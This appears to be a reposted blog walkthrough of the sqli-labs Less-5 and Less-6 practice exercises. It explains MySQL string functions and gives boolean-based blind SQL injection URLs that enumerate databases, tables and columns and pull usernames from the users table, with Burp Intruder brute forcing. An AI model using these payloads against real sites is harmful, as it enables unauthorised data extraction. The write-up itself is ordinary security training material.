sqli-labs Less-5 and Less-6

1. left() function: left(database(),1)='s'

   left(a, b) returns the leftmost b characters of a. Used in a comparison the expression evaluates to 1 when the characters match and to 0 when they do not.

   select left(database(), 1) = 's';   -- is the first character of the current database name an 's'?

2. regexp function: select user() regexp 'r'

   user() returns the current account, root@localhost here; regexp matches that string against the regular expression, so this returns 1 when the user name contains an r.

3. like function: select user() like 'ro%'

   like with the % wildcard does the same job as regexp for simple prefixes: this returns 1 when the user name starts with ro.

4. substr function: substr(a, b, c)

   substr(a, b, c) takes c characters of a starting at position b (positions are counted from 1).

5. ascii function: ascii() converts a character into its ASCII code.

   select ascii(substr((select database()), 1, 1));         -- echoes 115 directly (the code of 's')
   select ascii(substr((select database()), 1, 1)) > 110;   -- returns 1 if the code is greater than 110, otherwise 0

6. In Python, chr(number) and ord('letter') convert between an ASCII code and its character, which is how the numbers recovered by the comparisons above are turned back into text.

For the security database:

Less-05

Guess the number of columns: there are three.

Guess the database

Method one

http://192.168.50.254/sqli/Less-5/?id=1' and left((select database()),1)='s'--+

Burp capture and brute force

Submit the request, capture the packet in Burp and send it to Intruder (the brute-force module):

In Intruder, first clear all the marked positions, then mark the guessed letter as the only payload position.

Choose the brute forcer payload type with a length of 1, so that every single character is tried:

Threads: 50

Crack the second letter the same way, using left((select database()),2) with the first letter fixed.

Or test with a comparison instead of an exact match:
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select database()),1,1))>156--+   (no echo here)

There is no echo because the code of 's' is 115, which is not greater than 156; the comparison is working as intended, and lowering the threshold until the echo returns narrows the value down. Note that if no database were selected, database() would be NULL, ascii(substr(NULL,1,1)) would also be NULL and NULL > n is never true, so the page would not echo for any threshold; when a test never echoes, confirm first that the value is non-empty (for example with length(database())>0).

http://192.168.50.100/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+

limit 1,1 selects the second row, i.e. the second database name. No echo here, so the code of its first character is not greater than 100.

Guess the databases one at a time.

Guess the second letter.

Continue in the same way until the database name is recovered: challenge

1. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+  Binary search over the threshold recovers every database name; the limit offset, the substr position and the threshold are the parameters to vary.
2. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+  Binary search again recovers all tables under security (0x7365637572697479 is 'security' written as a hex literal, which avoids quotes in the payload); the same three parameters vary.
3. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>1--+  Binary search recovers the columns of users (0x7573657273 is 'users'); again vary the offset, position and threshold.
4. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select username from security.users limit 1,1),1,1))>1--+  Keep guessing the same way to get the values stored in the column.

Less-6

Adding a single quote makes no difference.

Adding a double quote produces an error.

So the id is a string closed with a double quote, and because the page only reveals whether the query matched, this is a boolean-based blind injection.

Then enumerate the columns: order by 3 echoes and order by 4 errors, so there are three columns.

Complete injection flow (identical to Less-5 apart from the closing double quote):
1. http://127.0.0.1/sqli/Less-6/?id=1" and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+  Binary search over the threshold recovers every database name; the limit offset, the substr position and the threshold are the parameters to vary.
2. http://127.0.0.1/sqli/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+  Binary search again recovers all tables under security; the same three parameters vary.
3. http://127.0.0.1/sqli/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>1--+  Binary search recovers the columns of users; again vary the offset, position and threshold.
4. http://127.0.0.1/sqli/Less-6/?id=1" and ascii(substr((select username from security.users limit 1,1),1,1))>1--+  Keep guessing the same way to get the values stored in the column.


Origin www.cnblogs.com/xingyuner/p/12227358.html